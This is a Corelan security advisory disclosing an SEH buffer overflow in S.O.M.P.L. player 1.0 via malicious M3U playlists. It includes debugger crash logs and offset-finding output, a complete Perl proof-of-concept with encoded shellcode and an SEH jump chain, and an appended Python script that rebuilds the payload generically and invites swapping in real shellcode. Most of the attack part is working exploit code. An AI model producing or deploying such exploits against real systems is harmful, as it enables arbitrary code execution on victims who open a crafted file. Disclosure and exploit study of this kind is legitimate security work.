
CORELAN-10-006.txt

Posted on 20 January 2010

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / /  __/ / /_/ / / / /   / /_/  __/ /_/ / / / / / / |
| \___/\____/_/  \___/_/\__,_/_/ /_/    \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@corelan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                       Vulnerability Disclosure Report            |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-006
Disclosure date : 20 January 2010
http://www.corelan.be:8800/index.php/forum/security-advisories/

0x00 : Vulnerability information
--------------------------------

[*] Product                     : S.O.M.P.L player
[*] Version                     : 1.0
[*] Vendor                      : George Fesalides
[*] URL                         : http://sourceforge.net/projects/somplmp3/files/
[*] URL2                        : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html
[*] Platform                    : Windows
[*] Type of vulnerability       : Buffer Overflow
[*] Risk rating                 : Medium
[*] Issue fixed in version      : ???
[*] Vulnerability discovered by : Rick2600
[*] Greetings to                : corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r

0x01 : Vendor description of software
-------------------------------------

S.O.M.P.L. is a Simple Open Music Player that plays mp3 files. This player loads mp3 files and stores them in a playlist. It includes features such as random track selection, track repetition, loading playlists and saving playlists.

0x02 : Vulnerability details
----------------------------

SOMPL does not bound the length of the entry it reads from an M3U playlist. An overlong entry overflows a stack buffer, overwrites saved registers and the Structured Exception Handler (SEH) chain, and lets the attacker redirect execution to code of their choosing, running with the privileges of the user who opened the playlist (see the crash information below). In order for the vulnerability to be triggered, an end user must be tricked into loading a malicious playlist (M3U) in SOMPL.
Crash information :

(dc.e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=00000000 edx=00000000 esi=0012eb48 edi=00000000
eip=40004ae4 esp=0012eb18 ebp=0012fb4c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
VCL50!SystemLStrClr$qqrr17SystemAnsiString:
40004ae4 8b10            mov     edx,dword ptr [eax]  ds:0023:41414141=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.

0:000> !exchain
0012eb2c: VCL50!StdctrlsTRadioButtonCNCommand$qqrr19MessagesTWMCommand+e6 (40048762)
0012fb7c: 41414141
Invalid exception stack at 41414141

!pvefindaddr findmsp :

Log data
0BADF00D -------------------------------------------------------------------------
0BADF00D Searching for metasploit pattern references
0BADF00D -------------------------------------------------------------------------
0BADF00D [1] Checking register addresses and contents
0BADF00D ============================================
0BADF00D Register EDI points to Metasploit pattern at position 0
0BADF00D Register EAX is overwritten with Metasploit pattern at position 4096
0BADF00D Register EBP points to Metasploit pattern at position 4100
0BADF00D Register EDX points to Metasploit pattern at position 0
0BADF00D Register EBX is overwritten with Metasploit pattern at position 4096
0BADF00D Register ESI points to Metasploit pattern at position 0
0BADF00D [2] Checking seh chain
0BADF00D ======================
0BADF00D - Checking seh chain entry at 0x0012eb2c, value 40048762
0BADF00D - Checking seh chain entry at 0x0012fb7c, value 46346946
0BADF00D => record is overwritten with Metasploit pattern at position 4152
0BADF00D -------------------------------------------------------------------------

The first-chance access violation is raised inside the VCL string-clearing routine (LStrClr): EAX has been overwritten with attacker data (0x41414141) and is then dereferenced. The exception registration record at 0012fb7c has been overwritten as well, so when the exception is dispatched the handler address comes from the attacker's buffer. With a Metasploit pattern in place of the A's, findmsp reports the handler pointer at offset 4152 of the payload; the next-SEH pointer therefore sits at offset 4148, which is the layout used by the PoC in section 0x04.

0x03 : Vendor communication
---------------------------

[*] 28 dec 2009 : Vendor contacted - no reply
[*] 09 jan 2010 : Vendor contacted again - still no reply
[*] 20 jan 2010 : Public disclosure

0x04 : Exploit/PoC
------------------

# Exploit Title  : SOMPL Player Buffer Overflow
# Date           : 20 January 2010
# Author         : Rick2600 (ricks2600[at]gmail{dot}com)
# Bug found by   : Rick2600 (ricks2600[at]gmail{dot}com)
# Software Link  : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html
# Version        : 1.0
# Issue fixed in : ???
# OS             : Windows
# Tested on      : XP SP2 and SP3 En
# Type of vuln   : Buffer Overflow
# Greetz to      : Corelan Security Team:: corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :

print "|------------------------------------------------------------------|\n";
print "|                         __               __                      |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / /  __/ / /_/ / / / /   / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/  \\___/_/\\__,_/_/ /_/    \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n";
print "[+] SOMPL Player Buffer Overflow - SEH Overwrite\n";

# M3U header (defined here but not prepended to the file by this script)
$header = "#EXTM3U\n#EXTINF:";

# Shellcode: x86/alpha_mixed( MsgBox )
$shellcode =
"\x89\xe7\xdb\xcf\xd9\x77\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x48\x6b\x44\x62\x50\x56\x46\x51\x4b\x70\x42" .
"\x44\x4c\x4b\x43\x70\x46\x50\x4b\x35\x4b\x70\x51\x68\x44" .
"\x4c\x4e\x6b\x47\x30\x44\x4c\x4c\x4b\x50\x70\x47\x6c\x4c" .
"\x6d\x4c\x4b\x43\x70\x46\x68\x4a\x4b\x46\x69\x4c\x4b\x43" .
"\x70\x44\x74\x4e\x6d\x43\x70\x51\x6c\x4c\x4b\x47\x30\x45" .
"\x6c\x43\x6e\x4f\x33\x48\x6b\x45\x39\x45\x30\x4c\x4b\x42" .
"\x4c\x51\x34\x51\x34\x4e\x6b\x43\x75\x47\x4c\x4e\x6b\x51" .
"\x44\x47\x75\x43\x48\x46\x61\x49\x7a\x4e\x6b\x50\x4a\x47" .
"\x68\x4e\x6b\x42\x7a\x51\x30\x43\x31\x4a\x4b\x4a\x43\x50" .
"\x34\x47\x39\x4c\x4b\x44\x74\x4c\x4b\x43\x31\x48\x6e\x50" .
"\x31\x4b\x4f\x45\x61\x49\x50\x4b\x4c\x4c\x6c\x4d\x54\x49" .
"\x50\x44\x34\x43\x37\x4a\x61\x48\x4f\x46\x6d\x46\x61\x48" .
"\x47\x48\x6b\x4b\x44\x45\x6b\x43\x4c\x44\x64\x46\x48\x50" .
"\x75\x4d\x31\x4c\x4b\x43\x6a\x51\x34\x47\x71\x48\x6b\x50" .
"\x66\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x46" .
"\x61\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x46\x61\x48\x68\x4d" .
"\x59\x47\x34\x46\x44\x45\x4c\x50\x61\x4f\x33\x4e\x4d\x42" .
"\x70\x46\x32\x48\x68\x4f\x5a\x4b\x4f\x4b\x4f\x49\x6f\x4e" .
"\x69\x43\x37\x51\x54\x51\x54\x47\x34\x43\x74\x43\x74\x47" .
"\x34\x43\x74\x42\x64\x47\x37\x47\x37\x50\x47\x42\x67\x50" .
"\x39\x48\x4e\x51\x65\x4b\x56\x4a\x63\x42\x6c\x50\x4c\x42" .
"\x6c\x42\x6c\x4d\x59\x4b\x55\x4b\x58\x45\x38\x4b\x4f\x49" .
"\x6f\x49\x6f\x4c\x49\x4b\x72\x48\x6b\x45\x4c\x51\x4e\x4c" .
"\x4d\x51\x6d\x45\x54\x4e\x69\x4c\x31\x4b\x30\x49\x51\x46" .
"\x6c\x48\x68\x4f\x38\x49\x6f\x49\x6f\x4b\x4f\x48\x6b\x47" .
"\x65\x45\x61\x49\x42\x51\x49\x4c\x48\x42\x71\x42\x34\x43" .
"\x61\x42\x72\x4b\x4f\x50\x54\x44\x64\x44\x4c\x4a\x48\x4b" .
"\x6f\x4b\x4f\x4b\x4f\x4b\x4f\x51\x47\x51\x6f\x51\x39\x42" .
"\x42\x48\x68\x48\x66\x4b\x4f\x49\x6f\x49\x6f\x47\x33\x42" .
"\x4f\x43\x42\x51\x75\x42\x4c\x50\x61\x42\x4e\x51\x30\x50" .
"\x54\x51\x75\x43\x51\x50\x6d\x51\x30\x44\x6d\x47\x50\x42" .
"\x70\x42\x77\x50\x4e\x50\x45\x42\x64\x42\x78\x41\x41";

$filename = "somplPOC.m3u";
print "[+] Check: $filename\n";

# Buffer layout (offsets into the file):
#   0    : 5-byte NOP sled, then the shellcode
#   ...  : "B" padding up to offset 4143
#   4143 : jmp -4147 (E9 CD EF FF FF) back into the NOP sled
#   4148 : nSEH = jmp short -7 (EB F9) onto that near jump, plus 2 NOPs
#   4152 : SEH handler = pop/pop/ret (the offset found with findmsp above)
$buffer = "\x90" x 5;
$buffer .= $shellcode;
$buffer .= "B" x (4138 - length($shellcode));
$buffer .= "\xE9\xCD\xEF\xFF\xFF";
$buffer .= "\xEB\xF9\x90\x90";
$buffer .= pack("V", 0x32501B07); # pop/pop/ret Universal from cc3250mt.dll

open (FILE, ">$filename");
print FILE $buffer;
close(FILE);
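The two steps the advisory walks through, offset hunting with a Metasploit pattern (section 0x02) and the SEH-overwrite layout of the PoC (section 0x04), carried out end to end in Python as an added example; this is not part of the advisory or of Rick2600's Perl script. It regenerates the Metasploit cyclic pattern, recovers the SEH record offset from the overwritten handler value 0x46346946 that findmsp reports, rebuilds the PoC layout from that offset with a constructed stand-in payload (sixteen int3 bytes instead of the MsgBox shellcode), and statically follows the nSEH short jump and the near jump to confirm they land in the NOP sled. The pop/pop/ret address 0x32501B07 is taken from the PoC; the near jump here targets offset 0 rather than the PoC's offset 1, which makes no difference inside the sled.

```python
import string
import struct

UPPER, LOWER, DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits

# pop/pop/ret in cc3250mt.dll, taken from the advisory's PoC
PPR = 0x32501B07


def pattern_create(length):
    """Metasploit-style cyclic pattern: triples Aa0, Aa1, ..., Aa9, Ab0, ..., Az9, Ba0, ...
    Every 4-byte window is unique within the first 20280 bytes."""
    out = bytearray()
    t = 0
    while len(out) < length:
        out += (UPPER[(t // 260) % 26] + LOWER[(t // 10) % 26] + DIGIT[t % 10]).encode()
        t += 1
    return bytes(out[:length])


def pattern_offset(pattern, dword):
    """Offset of a 32-bit value as the debugger prints it (little-endian in memory), or -1."""
    return pattern.find(struct.pack("<I", dword))


def seh_record_offsets(pattern, handler_dword):
    """From the overwritten handler value shown by !exchain, return (nseh_offset, seh_offset)."""
    seh = pattern_offset(pattern, handler_dword)
    if seh < 4:
        raise ValueError("handler value not found in pattern")
    return seh - 4, seh


def jmp_short(at, to):
    """2-byte 'jmp short rel8' placed at buffer offset `at`, landing at offset `to`."""
    rel = to - (at + 2)
    if not -128 <= rel <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", rel)


def jmp_near(at, to):
    """5-byte 'jmp rel32' placed at buffer offset `at`, landing at offset `to`."""
    return b"\xe9" + struct.pack("<i", to - (at + 5))


def build_seh_payload(shellcode, seh_offset, ppr, sled=5):
    """PoC layout: [nops][shellcode][B padding][jmp back][nSEH: jmp short][SEH: pop/pop/ret].
    pop/pop/ret lands on nSEH, the short jump hops back onto the near jump, and the near
    jump returns to the NOP sled in front of the shellcode."""
    nseh = seh_offset - 4
    tramp = nseh - 5                               # near jump sits right in front of nSEH
    buf = bytearray(b"\x90" * sled + shellcode)
    if len(buf) > tramp:
        raise ValueError("shellcode too long for the space before the SEH record")
    buf += b"B" * (tramp - len(buf))
    buf += jmp_near(tramp, 0)                      # E9 xx xx xx xx: back to the sled
    buf += jmp_short(nseh, tramp) + b"\x90\x90"    # EB F9 90 90 (nSEH)
    buf += struct.pack("<I", ppr)                  # SEH handler -> pop/pop/ret
    return bytes(buf)


def follow_jumps(buf, pc, max_hops=8):
    """Statically follow EB/E9 jumps from offset `pc`; return the first offset that is not a jump."""
    for _ in range(max_hops):
        op = buf[pc]
        if op == 0xEB:
            pc += 2 + struct.unpack("<b", buf[pc + 1:pc + 2])[0]
        elif op == 0xE9:
            pc += 5 + struct.unpack("<i", buf[pc + 1:pc + 5])[0]
        else:
            return pc
    raise RuntimeError("jump chain does not terminate")


if __name__ == "__main__":
    # Step 1: handler value reported by !exchain / findmsp in the advisory
    pat = pattern_create(5000)
    nseh_off, seh_off = seh_record_offsets(pat, 0x46346946)
    print("nSEH at %d, SEH handler at %d" % (nseh_off, seh_off))
    # Step 2: rebuild the PoC layout with a constructed stand-in payload (int3 x 16)
    payload = build_seh_payload(b"\xcc" * 16, seh_off, PPR)
    print("jump chain from nSEH lands at offset", follow_jumps(payload, nseh_off))
    with open("somplPOC.m3u", "wb") as f:
        f.write(payload)
```

Running it writes a file with the same geometry as the Perl PoC; replace the int3 stand-in with real shellcode and set a breakpoint on 0x32501B07 in the debugger to watch the chain pop/pop/ret, nSEH, near jump, sled execute in that order. Computing the displacements from the offsets, rather than hard-coding E9 CD EF FF FF, is what keeps the layout correct when the shellcode length or the sled size changes.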

